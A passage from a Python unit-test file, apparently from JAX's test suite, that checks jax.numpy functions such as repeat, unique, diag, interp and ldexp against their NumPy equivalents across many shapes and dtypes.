@unittest.skipIf(numpy_version < (1, 19), "boolean mask not supported in numpy < 1.19.0")
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "dtype": dtype, "shape": shape, "axis": axis}
    for shape in nonempty_nonscalar_array_shapes
    for dtype in all_dtypes
    for axis in [None] + list(range(-len(shape), len(shape)))))
def testDeleteMaskArray(self, shape, dtype, axis):
  """Check jnp.delete against np.delete for boolean mask indices."""
  rng = jtu.rand_default(self.rng())
  # Mask length matches the flattened size (axis=None) or the axis size.
  mask_size = np.zeros(shape).size if axis is None else np.zeros(shape).shape[axis]
  mask = jtu.rand_int(self.rng(), low=0, high=2)(mask_size, bool)
  args_maker = lambda: [rng(shape, dtype)]
  np_fun = lambda arg: np.delete(arg, mask, axis=axis)
  jnp_fun = lambda arg: jnp.delete(arg, mask, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_out_dims={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        axis, out_dims),
     "shape": shape, "dtype": dtype, "axis": axis, "out_dims": out_dims}
    for shape in nonempty_array_shapes
    for dtype in default_dtypes
    for axis in range(-len(shape), len(shape))
    for out_dims in [0, 1, 2]))
def testApplyAlongAxis(self, shape, dtype, axis, out_dims):
  """Check jnp.apply_along_axis for 0-, 1-, and 2-D slice results."""
  def func(x, out_dims):
    # Produces a result of the requested rank from a 1-D slice.
    if out_dims == 0:
      return x.sum()
    elif out_dims == 1:
      return x * x[0]
    elif out_dims == 2:
      return x[:, None] + x[None, :]
    else:
      raise NotImplementedError(f"out_dims={out_dims}")
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  np_fun = lambda arr: np.apply_along_axis(func, axis, arr, out_dims=out_dims)
  jnp_fun = lambda arr: jnp.apply_along_axis(func, axis, arr, out_dims=out_dims)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_func={}_keepdims={}_axes={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        func, keepdims, axes),
     "shape": shape, "dtype": dtype, "func": func, "keepdims": keepdims, "axes": axes}
    for shape in nonempty_shapes
    for func in ["sum"]
    for keepdims in [True, False]
    for axes in itertools.combinations(range(len(shape)), 2)
    # Avoid low-precision types in sum()
    for dtype in default_dtypes if dtype not in [np.float16, jnp.bfloat16]))
def testApplyOverAxes(self, shape, dtype, func, keepdims, axes):
  """Check jnp.apply_over_axes against np.apply_over_axes."""
  f = lambda x, axis: getattr(x, func)(axis=axis, keepdims=keepdims)
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: (rng(shape, dtype),)
  np_fun = lambda a: np.apply_over_axes(f, a, axes)
  jnp_fun = lambda a: jnp.apply_over_axes(f, a, axes)
  self._CompileAndCheck(jnp_fun, args_maker)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape=[{}]_axis={}_repeats={}_fixed_size={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        axis, repeats, fixed_size),
     "axis": axis, "shape": shape, "dtype": dtype, "repeats": repeats,
     'fixed_size': fixed_size}
    for repeats in [0, 1, 2]
    for shape, dtype in _shape_and_dtypes(all_shapes, default_dtypes)
    for axis in [None] + list(range(-len(shape), max(1, len(shape))))
    for fixed_size in [True, False]))
def testRepeat(self, axis, shape, dtype, repeats, fixed_size):
  """Check jnp.repeat, with and without a static total_repeat_length."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda arg: np.repeat(arg, repeats=repeats, axis=axis)
  np_fun = _promote_like_jnp(np_fun)
  if fixed_size:
    # Compute the output length with NumPy so `repeats` can stay dynamic.
    total_repeat_length = np.repeat(np.zeros(shape), repeats, axis).shape[axis or 0]
    jnp_fun = lambda arg, rep: jnp.repeat(arg, repeats=rep, axis=axis,
                                          total_repeat_length=total_repeat_length)
    jnp_args_maker = lambda: [rng(shape, dtype), repeats]
    clo_fun = lambda arg: jnp.repeat(arg, repeats=repeats, axis=axis,
                                     total_repeat_length=total_repeat_length)
    clo_fun_args_maker = lambda: [rng(shape, dtype)]
    self._CompileAndCheck(jnp_fun, jnp_args_maker)
    self._CheckAgainstNumpy(np_fun, clo_fun, clo_fun_args_maker)
  else:
    # Now repeats is in a closure, so a constant.
    jnp_fun = lambda arg: jnp.repeat(arg, repeats=repeats, axis=axis)
    args_maker = lambda: [rng(shape, dtype)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
def testRepeatScalarFastPath(self):
  """Repeating by a scalar count should lower to only a few jaxpr equations."""
  xs = jnp.array([1,2,3,4])
  def doubled(arr):
    return jnp.repeat(arr, repeats=2)
  traced = api.make_jaxpr(doubled)(xs)
  self.assertLessEqual(len(traced.jaxpr.eqns), 6)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_ind={}_inv={}_count={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis,
        return_index, return_inverse, return_counts),
     "shape": shape, "dtype": dtype, "axis": axis,
     "return_index": return_index, "return_inverse": return_inverse,
     "return_counts": return_counts}
    for dtype in number_dtypes
    for shape in all_shapes
    for axis in [None] + list(range(len(shape)))
    for return_index in [False, True]
    for return_inverse in [False, True]
    for return_counts in [False, True]))
def testUnique(self, shape, dtype, axis, return_index, return_inverse, return_counts):
  """Check jnp.unique against np.unique for every optional-output combination."""
  if axis is not None and numpy_version < (1, 19) and np.empty(shape).size == 0:
    self.skipTest("zero-sized axis in unique leads to error in older numpy.")
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  # The three booleans are passed positionally, matching numpy's signature
  # (return_index, return_inverse, return_counts).
  np_fun = lambda x: np.unique(x, return_index, return_inverse, return_counts, axis=axis)
  jnp_fun = lambda x: jnp.unique(x, return_index, return_inverse, return_counts, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_size={}".format(
        jtu.format_shape_dtype_string(shape, dtype), size),
     "shape": shape, "dtype": dtype, "size": size}
    for dtype in number_dtypes
    for size in [1, 5, 10]
    for shape in nonempty_array_shapes))
def testUniqueSize(self, shape, dtype, size):
  """Check jnp.unique with a static `size`: truncation or padding of outputs.

  The reference is built from jnp.unique without `size`, then truncated to
  `size`, or padded: uniques/indices with their first element, counts with
  zeros — mirroring the documented fill behavior of the `size` argument.
  """
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  kwds = dict(return_index=True, return_inverse=True, return_counts=True)
  def np_fun(x):
    # NOTE: uses jnp.unique (not np.unique) to get the unpadded reference.
    u, ind, inv, counts = jnp.unique(x, **kwds)
    if size <= len(u):
      u, ind, counts = u[:size], ind[:size], counts[:size]
    else:
      extra = size - len(u)
      u = np.concatenate([u, np.full(extra, u[0], u.dtype)])
      ind = np.concatenate([ind, np.full(extra, ind[0], ind.dtype)])
      counts = np.concatenate([counts, np.zeros(extra, counts.dtype)])
    # `inv` (inverse indices) is unaffected by padding/truncation.
    return u, ind, inv, counts
  jnp_fun = lambda x: jnp.unique(x, size=size, **kwds)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_fixed_size={}".format(fixed_size),
     "fixed_size": fixed_size}
    for fixed_size in [True, False]))
def testNonScalarRepeats(self, fixed_size):
  '''
  Following numpy test suite from `test_repeat` at
  https://github.com/numpy/numpy/blob/main/numpy/core/tests/test_multiarray.py
  '''
  tol = 1e-5

  def test_single(m, args_maker, repeats, axis):
    # Eager comparison against numpy for one (input, repeats, axis) combo.
    lax_ans = jnp.repeat(m, repeats, axis)
    numpy_ans = np.repeat(m, repeats, axis)

    self.assertAllClose(lax_ans, numpy_ans, rtol=tol, atol=tol)

    if fixed_size:

      # Calculate expected size of the repeated axis.
      rep_length = np.repeat(np.zeros_like(m), repeats, axis).shape[axis or 0]
      jnp_fun = lambda arg, rep: jnp.repeat(
          arg, repeats=rep, axis=axis, total_repeat_length=rep_length)
    else:
      jnp_fun = lambda arg: jnp.repeat(arg, repeats = repeats, axis=axis)
    self._CompileAndCheck(jnp_fun, args_maker)

  # 1D input, both per-element and broadcastable repeat arrays.
  m = jnp.array([1,2,3,4,5,6])
  if fixed_size:
    args_maker = lambda: [m, repeats]
  else:
    args_maker = lambda: [m]

  for repeats in [2, jnp.array([1,3,0,1,1,2]), jnp.array([1,3,2,1,1,2]), jnp.array([2])]:
    test_single(m, args_maker, repeats, axis=None)
    test_single(m, args_maker, repeats, axis=0)

  # 2D input: repeat along each axis in turn.
  m_rect = m.reshape((2,3))
  if fixed_size:
    args_maker = lambda: [m_rect, repeats]
  else:
    args_maker = lambda: [m_rect]

  for repeats in [2, jnp.array([2,1]), jnp.array([2])]:
    test_single(m_rect, args_maker, repeats, axis=0)

  for repeats in [2, jnp.array([1,3,2]), jnp.array([2])]:
    test_single(m_rect, args_maker, repeats, axis=1)
def testIssue2330(self):
  '''
  Make sure return value of jnp.concatenate is a jax.ndarray and is side-effect save
  '''
  def try_mutate(value):
    value = [value]
    joined = jnp.concatenate(value)
    joined -= 1.
    return joined

  numpy_arg = np.ones((1))
  jax_arg = jnp.ones((1))
  expected_numpy_arg_after_call = np.ones((1))
  expected_jax_arg_after_call = jnp.ones((1))

  # The result must be a device array even for a numpy input.
  self.assertTrue(xla.type_is_device_array(jnp.concatenate([numpy_arg])))

  # The in-place subtraction inside try_mutate must not leak into the inputs.
  try_mutate(numpy_arg)
  try_mutate(jax_arg)
  self.assertAllClose(numpy_arg, expected_numpy_arg_after_call)
  self.assertAllClose(jax_arg, expected_jax_arg_after_call)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "op={}_xshape=[{}]_yshape=[{}]_mode={}".format(
        op,
        jtu.format_shape_dtype_string(xshape, dtype),
        jtu.format_shape_dtype_string(yshape, dtype),
        mode),
     "xshape": xshape, "yshape": yshape, "dtype": dtype, "mode": mode,
     "jnp_op": getattr(jnp, op),
     "np_op": getattr(np, op)}
    for mode in ['full', 'same', 'valid']
    for op in ['convolve', 'correlate']
    for dtype in number_dtypes
    for xshape in one_dim_array_shapes
    for yshape in one_dim_array_shapes))
def testConvolutions(self, xshape, yshape, dtype, mode, jnp_op, np_op):
  """Check jnp.convolve/correlate against numpy for all 1D modes."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(xshape, dtype), rng(yshape, dtype)]
  # TPU matmuls default to lower precision; force HIGHEST there so the
  # tolerances below are achievable.
  precision = lax.Precision.HIGHEST if jtu.device_under_test() == "tpu" else None
  np_fun = partial(np_op, mode=mode)
  jnp_fun = partial(jnp_op, mode=mode, precision=precision)
  tol = {np.float16: 2e-1, np.float32: 1e-2, np.float64: 1e-14,
         np.complex128: 1e-14}
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                          tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "op={}_shape=[{}]_axis={}_out_dtype={}".format(
        op, jtu.format_shape_dtype_string(shape, dtype), axis,
        out_dtype.__name__),
     "axis": axis, "shape": shape, "dtype": dtype, "out_dtype": out_dtype,
     "jnp_op": getattr(jnp, op), "np_op": getattr(np, op)}
    for op in ["cumsum", "cumprod"]
    for dtype in all_dtypes
    for out_dtype in default_dtypes
    for shape in all_shapes
    for axis in [None] + list(range(-len(shape), len(shape)))))
def testCumSumProd(self, axis, shape, dtype, out_dtype, np_op, jnp_op):
  """Check jnp.cumsum/cumprod against numpy across axes and output dtypes."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda arg: np_op(arg, axis=axis, dtype=out_dtype)
  # Complex -> real output dtype casts emit ComplexWarning; silence it on
  # both sides so the comparison is warning-free.
  np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
  jnp_fun = lambda arg: jnp_op(arg, axis=axis, dtype=out_dtype)
  jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
  args_maker = lambda: [rng(shape, dtype)]
  tol_thresholds = {dtypes.bfloat16: 4e-2}
  # Tolerance follows the looser of input and output dtype precision.
  tol = max(jtu.tolerance(dtype, tol_thresholds),
            jtu.tolerance(out_dtype, tol_thresholds))
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "op={}_shape=[{}]_axis={}_out_dtype={}".format(
        op, jtu.format_shape_dtype_string(shape, dtype), axis,
        out_dtype.__name__),
     "axis": axis, "shape": shape, "dtype": dtype, "out_dtype": out_dtype,
     "jnp_op": getattr(jnp, op), "np_op": getattr(np, op)}
    for op in ["nancumsum", "nancumprod"]
    for dtype in all_dtypes
    for out_dtype in default_dtypes
    for shape in all_shapes
    for axis in [None] + list(range(-len(shape), len(shape)))))
def testNanCumSumProd(self, axis, shape, dtype, out_dtype, np_op, jnp_op):
  """Check jnp.nancumsum/nancumprod against numpy on NaN-containing inputs."""
  rng = jtu.rand_some_nan(self.rng())
  np_fun = partial(np_op, axis=axis, dtype=out_dtype)
  # Complex -> real output dtype casts emit ComplexWarning on both sides.
  np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
  jnp_fun = partial(jnp_op, axis=axis, dtype=out_dtype)
  jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
  args_maker = lambda: [rng(shape, dtype)]
  tol_thresholds = {dtypes.bfloat16: 4e-2}
  tol = max(jtu.tolerance(dtype, tol_thresholds),
            jtu.tolerance(out_dtype, tol_thresholds))
  if dtype != jnp.bfloat16:
    # numpy functions do not properly handle bfloat16
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True,
                            tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_yshape={}_xshape={}_dx={}_axis={}".format(
        jtu.format_shape_dtype_string(yshape, dtype),
        jtu.format_shape_dtype_string(xshape, dtype) if xshape is not None else None,
        dx, axis),
     "yshape": yshape, "xshape": xshape, "dtype": dtype, "dx": dx, "axis": axis}
    for dtype in default_dtypes
    # (yshape, xshape, dx, axis): xshape=None exercises the dx-only path;
    # mismatched ranks exercise implicit rank promotion.
    for yshape, xshape, dx, axis in [
      ((10,), None, 1.0, -1),
      ((3, 10), None, 2.0, -1),
      ((3, 10), None, 3.0, -0),
      ((10, 3), (10,), 1.0, -2),
      ((3, 10), (10,), 1.0, -1),
      ((3, 10), (3, 10), 1.0, -1),
      ((2, 3, 10), (3, 10), 1.0, -2),
    ]))
@jtu.skip_on_devices("tpu")  # TODO(jakevdp): fix and reenable this test.
@jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
def testTrapz(self, yshape, xshape, dtype, dx, axis):
  """Check jnp.trapz against np.trapz, with and without sample points x."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(yshape, dtype), rng(xshape, dtype) if xshape is not None else None]
  np_fun = partial(np.trapz, dx=dx, axis=axis)
  jnp_fun = partial(jnp.trapz, dx=dx, axis=axis)
  tol = jtu.tolerance(dtype, {np.float64: 1e-12,
                              dtypes.bfloat16: 4e-2})
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, tol=tol,
                          check_dtypes=False)
  self._CompileAndCheck(jnp_fun, args_maker, atol=tol, rtol=tol,
                        check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_dtype={}_m={}_n={}_k={}".format(
        np.dtype(dtype).name, m, n, k),
     "m": m, "n": n, "k": k, "dtype": dtype}
    for dtype in default_dtypes
    for n in [0, 4]
    for m in [None, 0, 1, 3, 4]
    for k in list(range(-4, 4))))
def testTri(self, m, n, k, dtype):
  """jnp.tri matches np.tri across row/column counts and diagonal offsets."""
  make_np = partial(np.tri, n, M=m, k=k, dtype=dtype)
  make_jnp = partial(jnp.tri, n, M=m, k=k, dtype=dtype)
  no_args = lambda: []
  self._CheckAgainstNumpy(make_np, make_jnp, no_args)
  self._CompileAndCheck(make_jnp, no_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_op={}_shape={}_k={}".format(
        op, jtu.format_shape_dtype_string(shape, dtype), k),
     "dtype": dtype, "shape": shape, "op": op, "k": k}
    for dtype in default_dtypes
    for shape in [shape for shape in all_shapes if len(shape) >= 2]
    for op in ["tril", "triu"]
    for k in list(range(-3, 3))))
def testTriLU(self, dtype, shape, op, k):
  """jnp.tril/jnp.triu agree with their numpy counterparts for all offsets."""
  rng = jtu.rand_default(self.rng())
  reference_op = partial(getattr(np, op), k=k)
  tested_op = partial(getattr(jnp, op), k=k)
  make_args = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(reference_op, tested_op, make_args)
  self._CompileAndCheck(tested_op, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "n={}_k={}_m={}".format(n, k, m),
     "n": n, "k": k, "m": m}
    for n in range(1, 5)
    for k in [-1, 0, 1]
    for m in range(1, 5)))
def testTrilIndices(self, n, k, m):
  """jnp.tril_indices matches np.tril_indices for small sizes and offsets."""
  make_args = lambda: [n, k, m]
  reference = lambda rows, diag, cols: np.tril_indices(rows, k=diag, m=cols)
  tested = lambda rows, diag, cols: jnp.tril_indices(rows, k=diag, m=cols)
  self._CheckAgainstNumpy(reference, tested, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "n={}_k={}_m={}".format(n, k, m),
     "n": n, "k": k, "m": m}
    for n in range(1, 5)
    for k in [-1, 0, 1]
    for m in range(1, 5)))
def testTriuIndices(self, n, k, m):
  """jnp.triu_indices matches np.triu_indices for small sizes and offsets."""
  make_args = lambda: [n, k, m]
  reference = lambda rows, diag, cols: np.triu_indices(rows, k=diag, m=cols)
  tested = lambda rows, diag, cols: jnp.triu_indices(rows, k=diag, m=cols)
  self._CheckAgainstNumpy(reference, tested, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_k={}".format(
        jtu.format_shape_dtype_string(shape, dtype), k),
     "dtype": dtype, "shape": shape, "k": k}
    for dtype in default_dtypes
    for shape in [(1,1), (1,2), (2,2), (2,3), (3,2), (3,3), (4,4)]
    for k in [-1, 0, 1]))
def testTriuIndicesFrom(self, shape, dtype, k):
  """jnp.triu_indices_from matches numpy on 2D arrays of assorted shapes."""
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [rng(shape, dtype), k]
  reference = lambda arr, diag: np.triu_indices_from(arr, k=diag)
  tested = lambda arr, diag: jnp.triu_indices_from(arr, k=diag)
  self._CheckAgainstNumpy(reference, tested, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_k={}".format(
        jtu.format_shape_dtype_string(shape, dtype), k),
     "dtype": dtype, "shape": shape, "k": k}
    for dtype in default_dtypes
    for shape in [(1,1), (1,2), (2,2), (2,3), (3,2), (3,3), (4,4)]
    for k in [-1, 0, 1]))
def testTrilIndicesFrom(self, shape, dtype, k):
  """jnp.tril_indices_from matches numpy on 2D arrays of assorted shapes."""
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [rng(shape, dtype), k]
  reference = lambda arr, diag: np.tril_indices_from(arr, k=diag)
  tested = lambda arr, diag: jnp.tril_indices_from(arr, k=diag)
  self._CheckAgainstNumpy(reference, tested, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_ndim={}_n={}".format(ndim, n),
"ndim": ndim, "n": n}
for ndim in [0, 1, 4]
for n in [0, 1, 7]))
def testDiagIndices(self, ndim, n):
np.testing.assert_equal(np.diag_indices(n, ndim),
jnp.diag_indices(n, ndim))
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "arr_shape={}".format(
        jtu.format_shape_dtype_string(shape, dtype)
    ),
     "dtype": dtype, "shape": shape}
    for dtype in default_dtypes
    for shape in [(1,1), (2,2), (3,3), (4,4), (5,5)]))
def testDiagIndicesFrom(self, dtype, shape):
  """jnp.diag_indices_from matches numpy on square arrays."""
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np.diag_indices_from, jnp.diag_indices_from, make_args)
  self._CompileAndCheck(jnp.diag_indices_from, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_k={}".format(
        jtu.format_shape_dtype_string(shape, dtype), k),
     "dtype": dtype, "shape": shape, "k": k}
    for dtype in default_dtypes
    for shape in [shape for shape in all_shapes if len(shape) in (1, 2)]
    for k in list(range(-4, 4))))
def testDiag(self, shape, dtype, k):
  """jnp.diag matches np.diag for both 1D (construct) and 2D (extract) inputs."""
  rng = jtu.rand_default(self.rng())
  reference = partial(np.diag, k=k)
  tested = partial(jnp.diag, k=k)
  make_args = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(reference, tested, make_args)
  self._CompileAndCheck(tested, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_k={}".format(
        jtu.format_shape_dtype_string(shape, dtype), k),
     "dtype": dtype, "shape": shape, "k": k}
    for dtype in default_dtypes
    for shape in all_shapes
    for k in range(-4, 4)))
def testDiagFlat(self, shape, dtype, k):
  """Check jnp.diagflat against np.diagflat, normalizing numpy's scalar quirk."""
  rng = jtu.rand_default(self.rng())
  # numpy has inconsistencies for scalar values
  # https://github.com/numpy/numpy/issues/16477
  # jax differs in that it treats scalars values as length-1 arrays
  np_fun = lambda arg: np.diagflat(np.atleast_1d(arg), k)
  jnp_fun = lambda arg: jnp.diagflat(arg, k)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_a1_shape={}_a2_shape2={}".format(
        jtu.format_shape_dtype_string(a1_shape, dtype),
        jtu.format_shape_dtype_string(a2_shape, dtype)),
     "dtype": dtype, "a1_shape": a1_shape, "a2_shape": a2_shape}
    for dtype in default_dtypes
    for a1_shape in one_dim_array_shapes
    for a2_shape in one_dim_array_shapes))
def testPolyMul(self, a1_shape, a2_shape, dtype):
  """Check jnp.polymul against np.polymul.

  The numpy comparison uses trim_leading_zeros=True to match numpy's output
  convention; the compile check uses the default (static-shape) variant.
  """
  rng = jtu.rand_default(self.rng())
  np_fun = lambda arg1, arg2: np.polymul(arg1, arg2)
  jnp_fun_np = lambda arg1, arg2: jnp.polymul(arg1, arg2, trim_leading_zeros=True)
  jnp_fun_co = lambda arg1, arg2: jnp.polymul(arg1, arg2)
  args_maker = lambda: [rng(a1_shape, dtype), rng(a2_shape, dtype)]
  tol = {np.float16: 2e-1, np.float32: 5e-2, np.float64: 1e-13}
  self._CheckAgainstNumpy(np_fun, jnp_fun_np, args_maker, check_dtypes=False, tol=tol)
  self._CompileAndCheck(jnp_fun_co, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_offset={}_axis1={}_axis2={}".format(
        jtu.format_shape_dtype_string(shape, dtype), offset, axis1, axis2),
     "dtype": dtype, "shape": shape, "offset": offset, "axis1": axis1,
     "axis2": axis2}
    for dtype in default_dtypes
    for shape in [shape for shape in all_shapes if len(shape) >= 2]
    for axis1 in range(-len(shape), len(shape))
    # axis2 must name a different dimension than axis1 (modulo rank).
    for axis2 in [a for a in range(-len(shape), len(shape))
                  if a % len(shape) != axis1 % len(shape)]
    for offset in list(range(-4, 4))))
def testDiagonal(self, shape, dtype, offset, axis1, axis2):
  """Check jnp.diagonal against np.diagonal for all axis pairs and offsets."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda arg: np.diagonal(arg, offset, axis1, axis2)
  jnp_fun = lambda arg: jnp.diagonal(arg, offset, axis1, axis2)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_n={}".format(np.dtype(dtype).name, n),
     "dtype": dtype, "n": n}
    for dtype in default_dtypes
    for n in list(range(4))))
def testIdentity(self, n, dtype):
  """jnp.identity matches np.identity, including the n=0 case."""
  make_np = partial(np.identity, n, dtype)
  make_jnp = partial(jnp.identity, n, dtype)
  no_args = lambda: []
  self._CheckAgainstNumpy(make_np, make_jnp, no_args)
  self._CompileAndCheck(make_jnp, no_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_period={}_left={}_right={}".format(
        jtu.format_shape_dtype_string(shape, dtype), period, left, right),
     "shape": shape, "dtype": dtype,
     "period": period, "left": left, "right": right}
    for shape in nonempty_shapes
    for period in [None, 0.59]
    for left in [None, 0]
    for right in [None, 1]
    for dtype in default_dtypes
    # following types lack precision for meaningful tests
    if dtype not in [np.int8, np.int16, np.float16, jnp.bfloat16]
    ))
def testInterp(self, shape, dtype, period, left, right):
  """Check jnp.interp against np.interp, covering period/left/right options."""
  rng = jtu.rand_default(self.rng(), scale=10)
  kwds = dict(period=period, left=left, right=right)
  np_fun = partial(np.interp, **kwds)
  jnp_fun = partial(jnp.interp, **kwds)
  # Args: query points, sorted sample positions, sample values in [0, 1].
  args_maker = lambda: [rng(shape, dtype), np.sort(rng((20,), dtype)), np.linspace(0, 1, 20)]
  # skip numpy comparison for integer types with period specified, because numpy
  # uses an unstable sort and so results differ for duplicate values.
  if not (period and np.issubdtype(dtype, np.integer)):
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, tol={np.float32: 2E-4})
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_x1={}_x2={}_x1_rng={}".format(
        jtu.format_shape_dtype_string(x1_shape, x1_dtype),
        jtu.format_shape_dtype_string(x2_shape, np.int32),
        x1_rng_factory_id),
     "x1_shape": x1_shape, "x1_dtype": x1_dtype,
     "x2_shape": x2_shape, "x1_rng_factory": x1_rng_factory,
     "x2_rng_factory": x2_rng_factory}
    for x1_rng_factory_id, x1_rng_factory in
      enumerate([jtu.rand_some_inf_and_nan, jtu.rand_some_zero])
    # Exponent range chosen to cover sub-normal through overflow behavior.
    for x2_rng_factory in [partial(jtu.rand_int, low=-1075, high=1024)]
    for x1_shape, x2_shape in filter(_shapes_are_broadcast_compatible,
                                     itertools.combinations_with_replacement(array_shapes, 2))
    for x1_dtype in default_dtypes))
@jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
def testLdexp(self, x1_shape, x1_dtype, x2_shape, x1_rng_factory, x2_rng_factory):
  """Check jnp.ldexp against np.ldexp over broadcastable shape pairs."""
  # integer types are converted to float64 in numpy's implementation
  if (x1_dtype not in [jnp.bfloat16, np.float16, np.float32]
      and not config.x64_enabled):
    self.skipTest("Only run float64 testcase when float64 is enabled.")
  x1_rng = x1_rng_factory(self.rng())
  x2_rng = x2_rng_factory(self.rng())
  np_fun = lambda x1, x2: np.ldexp(x1, x2)
  # Large exponents intentionally overflow; silence numpy's warning.
  np_fun = jtu.ignore_warning(category=RuntimeWarning,
                              message="overflow.*")(np_fun)
  jnp_fun = lambda x1, x2: jnp.ldexp(x1, x2)
  args_maker = lambda: [x1_rng(x1_shape, x1_dtype),
                        x2_rng(x2_shape, np.int32)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_x={}_rng_factory={}".format(
        jtu.format_shape_dtype_string(shape, dtype), rng_factory_id),
     "shape": shape, "dtype": dtype, "rng_factory": rng_factory}
    for rng_factory_id, rng_factory in enumerate([
        jtu.rand_some_inf_and_nan,
        jtu.rand_some_zero,
        partial(jtu.rand_not_small, offset=1e8),
    ])
    for shape in all_shapes
    for dtype in default_dtypes))
def testFrexp(self, shape, dtype, rng_factory):
  """Check jnp.frexp against np.frexp, including inf/nan/zero/large inputs."""
  # integer types are converted to float64 in numpy's implementation
  if (dtype not in [jnp.bfloat16, np.float16, np.float32]
      and not config.x64_enabled):
    self.skipTest("Only run float64 testcase when float64 is enabled.")
  rng = rng_factory(self.rng())
  np_fun = lambda x: np.frexp(x)
  jnp_fun = lambda x: jnp.frexp(x)
  args_maker = lambda: [rng(shape, dtype)]
  # Only check dtypes for inexact inputs; integer inputs promote differently.
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          check_dtypes=np.issubdtype(dtype, np.inexact))
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_dtype_{}_offset={}_axis1={}_axis2={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        out_dtype, offset, axis1, axis2),
     "dtype": dtype, "out_dtype": out_dtype, "shape": shape, "offset": offset,
     "axis1": axis1, "axis2": axis2}
    for dtype in default_dtypes
    for out_dtype in [None] + number_dtypes
